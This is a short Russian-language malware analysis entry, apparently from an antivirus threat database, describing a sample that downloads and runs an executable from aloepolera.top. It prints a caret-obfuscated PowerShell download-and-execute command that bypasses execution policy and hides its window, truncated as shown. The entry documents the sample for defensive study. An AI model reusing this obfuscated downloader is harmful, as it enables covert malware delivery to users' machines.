Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "PoWERsH^ELL.EXE -^ex^EcU^tIoN^Po^LICy ^byP^a^S^S^ ^-N^oPROF^I^L^e -wi^ndO^W^sT^yLE HI^D^d^E^n ^(NEw-O^bjec^T ^SYS^T^Em.N^e^t^.w^e^B^Cl^I^Ent^).^DoWnLOa^D^F^ilE^(^'http://aloepol...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "PoWERsH^ELL.EXE -^ex^EcU^tIoN^Po^LICy ^byP^a^S^S^ ^-N^oPROF^I^L^e -wi^ndO^W^sT^yLE HI^D^d^E^n ^(NEw-O^bjec^T ^SYS^T^Em.N^e^t^.w^e^B^Cl^I^Ent^).^DoWnLOa^D^F^ilE^(^'http://aloepol...' (со скрытым окном)
